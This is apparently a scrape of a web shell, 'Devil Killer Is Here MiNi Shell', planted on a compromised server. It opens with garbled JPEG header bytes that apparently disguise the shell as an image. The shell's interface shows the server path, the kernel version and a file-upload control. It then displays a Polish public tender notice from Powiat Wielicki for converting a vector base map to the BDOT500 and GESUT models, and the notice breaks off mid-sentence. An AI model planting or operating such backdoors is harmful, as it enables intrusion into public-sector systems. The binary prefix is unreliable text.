JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220429/0014205501-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przekształcenie wektorowej mapy zasadniczej dla jednostki ewidencyjnej Wieliczka-obszar wiejski do obowiązującego modelu pojęciowego BDOT500 i GESUT </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Wielicki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351554531</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek Górny 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wieliczka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 399 98 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@powiatwielicki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.powiatwielicki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przekształcenie wektorowej mapy zasadniczej dla jednostki ewidencyjnej Wieliczka-obszar wiejski do obowiązującego modelu pojęciowego BDOT500 i GESUT </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9170aaf9-c7b9-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00142055</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001234/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Przekształcenie wektorowej mapy zasadniczej dla jednostki ewidencyjnej Wieliczka obszar wiejski do obowiązujacego modelu BDOT500 i GESUT</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://bip.malopolska.pl/spwieliczka,m,403759,2022.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a<br/>Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, oraz poczty elektronicznej<br/>przetargi@powiatwielicki.pl<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP.<br/>Wykonawca posiadający konto na ePUAP ma dostęp do: formularza do złożenia, zmiany, wycofania oferty lub wniosku oraz<br/>formularza do komunikacji. Strona postępowania https://bip.malopolska.pl/spwieliczka,m,403759,2022.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do: formularza do złożenia, zmiany, wycofania oferty lub wniosku oraz formularza do komunikacji. 2. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortalu oraz Regulaminu ePUAP. 3. Wykonawca przystępując do postępowania o udzielenie<br/>zamówienia publicznego, akceptuje postanowienia regulaminów, o<br/>których mowa powyżej, a także instrukcji użytkowania systemu miniPortal oraz uznaje je za wiążące.<br/>4.Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty lub<br/>wniosku oraz do komunikacji wynosi 150 MB.5. Za datę przekazania wniosków, zawiadomień, dokumentów lektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na<br/>ePUAP lub na adres poczty elektronicznej wskazanej do kontaktu w niniejszym postępowaniu . Identyfikator postępowania jest<br/>dostępny są na Liście wszystkich postępowań na miniPortalu. Dane postępowanie można wyszukać na Liście wszystkich<br/>postępowań klikając wcześniej opcję ,,Dla Wykonawców’’ lub ze strony głównej z zakładki Postępowania na miniPortalu.7. Nazwa<br/>odbiorcy na platformie ePUAP:Powiat Wielicki, Adres skrytki ePUAP: /o03wq89ojp/SkrytkaESP . W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy Zamawiającym, a Wykonawcami (za wyjątkiem złożenia oświadczenia z art. 125 ust. 1 pzp i<br/>oferty wraz z załącznikami) w szczególności składanie oświadczeń,wniosków, zawiadomień oraz przekazywanie informacji odbywa<br/>się elektronicznie pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal<br/>(Formularz do komunikacji), a także za pomocą poczty elektronicznej wskazanej do kontaktu w niniejszym postępowaniu 9. We<br/>wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania (<br/>lub ID postępowania).10.Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są<br/>przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość<br/>składania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty<br/>elektronicznej, na wskazany adres e-mail. 11. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020, poz. 2452) oraz<br/>rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz<br/>innych dokumentów lub oświadczeń, jakich<br/>może żądać zamawiający od wykonawcy (Dz.U. z 2020, poz. 2415).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem Pani/Pana danych osobowych jest Starosta<br/>Wielicki będący kierownikiem Starostwa Powiatowego w Wieliczce z siedzibą władz przy ul. Rynek Górny 2, tel. 12 3999800, faks 12<br/>3999701 , e-mail: sekretariat@powiatwielicki.pl Administrator wyznaczył Inspektora Ochrony Danych, z którym może się Pani/Pan<br/>skontaktować w sprawach związanych z ochroną danych osobowych, w następujący sposób: pod adresem poczty elektronicznej:<br/>iod@powiatwielicki.pl , pisemnie na adres siedziby Administratora -Wieliczka ul. Rynek Górny 2. Przetwarzanie Pani/Pana danych<br/>odbywa się w związku z realizacją zadań własnych bądź zleconych Starostwu Powiatowemu w Wieliczce określonych przepisami<br/>prawa,w szczególności w art. 4, 4a i<br/>5ustawy o samorządzie powiatowym, w celu realizacji przysługujących starostwu uprawnień, bądź spełnienia przez starostwo<br/>obowiązków określonych tymi przepisami prawa albo gdy jest to niezbędne do wykonania zadania realizowanego w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej. Przetwarzanie może być również niezbędne w celu wykonania umowy, której Pani/Pan jest stroną lub do podjęcia<br/>działań, na Pani/Pana żądanie przed zawarciem umowy.Mogą również wystąpić przypadki w których zostanie Pani/Pan<br/>poproszona/y o wyrażenie zgody na przetwarzanie danych<br/>osobowych w określonym celu i zakresie. Dane nie będą przekazywane innym podmiotom, z wyjątkiem podmiotów<br/>uprawnionych do ich przetwarzania na podstawie przepisów prawa tj. podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 74 pzp. Pani/Pana dane osobowe będą przechowywane jedynie w okresie niezbędnym do spełnienia<br/>celu, dla którego zostały zebrane lub w okresie wskazanym przepisami prawa.Po spełnieniu celu, dla którego Pani/Pana dane<br/>zostały zebrane, mogą one być przechowywane jedynie w celach archiwalnych, przez okres, który wyznaczony zostanie przede<br/>wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu<br/>działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej. Na zasadach określonych przepisami RODO,<br/>posiada Pani/Pan prawo do żądania od administratora: 1. dostępu do treści swoich danych osobowych, 2. sprostowania<br/>(poprawiania) swoich danych osobowych, 3. usunięcia swoich danych osobowych w zakresie danych przetwarzanych na podstawie<br/>wyrażonej przez Panią/Pana zgody, 4.ograniczenia przetwarzania swoich danych osobowych w momencie gdy prawidłowość<br/>przetwarzania<br/>danych osobowych jest kwestionowana, 5. przenoszenia swoich danych osobowych w zakresie danych przetwarzanych na<br/>podstawie wyrażonej przez Panią/Pana zgody, a ponadto, posiada Pani/Pan prawo do wniesienia sprzeciwu wobec przetwarzania<br/>Pani/Pana danych. Tam, gdzie do przetwarzania danych osobowych konieczne jest wyrażenie zgody, zawsze ma Pani/Pan prawo<br/>nie wyrazić zgody, a w przypadku jej wcześniejszego wyrażenia, do cofnięcia zgody. Wycofanie zgody nie ma wpływu na<br/>przetwarzanie Pani/Pana danych do momentu jej wycofania. Gdy uzna Pani/Pan, iż przetwarzanie Pani/Pana danych osobowych<br/>narusza przepisy o ochronie danych osobowych, przysługuje Pani/Panu prawo do wniesienia skargi do organu nadzorczego, którym<br/>jest Prezes Urzędu Ochrony Danych Osobowych. 1. Podanie przez Panią/Pana danych osobowych może być wymogiem: a.<br/>ustawowym, b. umownym, c. warunkiem zawarcia umowy, b) do których<br/>podania będzie Pani/Pan zobowiązana/y. 2. W przypadku, gdy będzie istniał obowiązek ustawowy, a nie poda Pani/Pan swoich<br/>danych, nie będziemy mogli zrealizować zadania ustawowego, co może skutkować konsekwencjami przewidzianymi przepisami<br/>prawa. 3. W przypadku, gdy będzie istniał wymóg umowny, a nie poda Pani/Pan swoich danych, nie będziemy mogli wykonać takiej<br/>umowy. 4. W przypadku, kiedy podanie danych będzie warunkiem zawarcia umowy, a nie poda Pani/Pan swoich danych, nie<br/>będziemy mogli zawrzeć takiej umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZIU 272.4.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia w ujęciu ogólnym jest wykonanie konwersji wektorowej mapy zasadniczej obszaru wszystkich<br/>obrębów ewidencyjnych (Byszyce, Chorągwica, Dobranowice, Golkowice, Gorzków, Grabówki, Grajów, Jankówka,<br/>Janowice, Koźmice Małe, Koźmice Wielkie, Mietniów, Pawlikowice, Podstolice, Raciborsko, Rożnowa, Siercza, Sygneczów<br/>– Część I (południe); w jednostce ewidencyjnej Wieliczka – obszar wiejski, metodą kwalifikacji prostej oraz większościowej<br/>w celu dostosowania do docelowego obowiązującego pojęciowego modelu danych. Obszar opracowania zajmuje około<br/>86,27 km2 (Część I – 55,45 km2, Część II – 30,82 km2), liczy 38912 (Część I - 20684, Część II - 18228) działek<br/>ewidencyjnych oraz 20595 (Część I - 11783, Część II - 8812) budynków ewidencyjnych (stan na dzień 28.06.2021r.). Na<br/>obszarze opracowania występuje około 624187 szt. (Część I - 368706, Część II - 255481) obiektów wektorowej mapy<br/>zasadniczej (WMZ) podlegających opracowaniu oraz około 6283 szt. (Część I - 3508, Część II - 2775) elementów<br/>dodatkowych do budynków (stan na dzień 18.08.2021 r.). 3. Szczegółowy opis przedmiotu zamówienia zawarty jest w WT<br/>wraz z załącznikami, stanowiących Załącznik nr 1 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72311100-9 - Usługi konwersji danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika prac</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia w ujęciu ogólnym jest wykonanie konwersji wektorowej mapy zasadniczej obszaru wszystkich<br/>obrębów ewidencyjnych; Brzegi, Czarnochowice, Grabie, Kokotów, Lednica Górna, Mała Wieś, Strumiany, Sułków,<br/>Śledziejowice, Węgrzce Wielkie, Zabawa – Część II (północ)) w jednostce ewidencyjnej Wieliczka – obszar wiejski, metodą<br/>kwalifikacji prostej oraz większościowej w celu dostosowania do docelowego obowiązującego pojęciowego modelu danych.<br/>Obszar opracowania zajmuje około 86,27 km2 (Część I – 55,45 km2, Część II – 30,82 km2), liczy 38912 (Część I - 20684,<br/>Część II - 18228) działek ewidencyjnych oraz 20595 (Część I - 11783, Część II - 8812) budynków ewidencyjnych (stan na<br/>dzień 28.06.2021r.). Na obszarze opracowania występuje około 624187 szt. (Część I - 368706, Część II - 255481) obiektów<br/>wektorowej mapy zasadniczej (WMZ) podlegających opracowaniu oraz około 6283 szt. (Część I - 3508, Część II - 2775)<br/>elementów dodatkowych do budynków (stan na dzień 18.08.2021 r.).<br/>2. Szczegółowy opis przedmiotu zamówienia zawarty jest w WT wraz z załącznikami, stanowiących Załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72311100-9 - Usługi konwersji danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie kierownika prac</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolność techniczna lub zawodowa:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dla części I i II:<br/>1) w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie), wykonał a w przypadku świadczeń okresowych lub ciągłych wykonuje, w sposób należyty, co najmniej<br/>jedną usługę polegającą na przekształceniu/dostosowaniu/konwersji danych cyfrowych do obowiązującego modelu baz<br/>danych BDOT500 i GESUT, gdzie obszar opracowania stanowił jedną jednostkę ewidencyjną miasta lub 10 obrębów<br/>ewidencyjnych terenów wiejskich o znacznym stopniu urbanizacji (średnio na 1 ha powierzchni administracyjnej terenu<br/>wiejskiego przypadały minimum 2 budynki); wartość usługi była nie mniejsza niż 150000 zł brutto (słownie: sto pięćdziesiąt<br/>tysięcy).<br/>Wykonawca może wykazać się doświadczeniem należytego wykonania opracowania/dostawy baz danych BDOT500 i<br/>GESUT w obszarze i zakresie prac wskazanym w warunku zamiast wykazać się doświadczeniem wykonania<br/>przekształcenia/dostosowania/konwersji danych cyfrowych do obowiązującego modelu baz BDOT500 i GESUT wyłącznie<br/>wówczas, kiedy opracowanie/dostawa baz danych BDOT500 i GESUT obejmowała obszar opracowania, gdzie<br/>dotychczasowa wektorowa mapa zasadnicza stanowiła, do przekształcenia/dostosowania/konwersji danych cyfrowych<br/>minimum 50% treści wynikowych baz danych.<br/>2) dysponuje lub będzie dysponował następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia, tj.:<br/>a) kierownikiem prac - minimum 1 osoba do kierowania i nadzorowania prac posiadająca uprawnienia z zakresu 1 określone<br/>w art. 43 pkt 1 ustawy Prawo geodezyjne i kartograficzne oraz doświadczenie przy kierowaniu realizacją minimum jednej<br/>usługi polegającej na przekształceniu/dostosowaniu/konwersji danych cyfrowych do obowiązującego modelu baz danych<br/>BDOT500 i GESUT, gdzie obszar opracowania stanowił jedną jednostkę ewidencyjną miasta lub 10 obrębów ewidencyjnych<br/>terenów wiejskich o znacznym stopniu urbanizacji (średnio na 1 ha powierzchni administracyjnej terenu wiejskiego<br/>przypadały minimum 2 budynki) a wartość usługi była nie mniejsza niż 150000 zł brutto (słownie: sto pięćdziesiąt tysięcy);<br/>b) minimum 2 osobami posiadającymi wykształcenie geodezyjne (minimum średnie), minimum 2 letni staż pracy oraz<br/>doświadczenie przy realizacji minimum jednej usługi polegającej na przekształceniu/dostosowaniu/przekonwerterowaniu<br/>danych cyfrowych do obowiązującego modelu baz BDOT500 i GESUT<br/>Uwaga 1:W przypadku wykazywania przez Wykonawcę, w zakresie posiadanego doświadczenia zawodowego (kwalifikacje<br/>zawodowe), usług będących w trakcie realizacji, Zamawiający uzna warunek za spełniony jeżeli wykazana cześć<br/>zamówienia wykonana do upływu terminu składania ofert 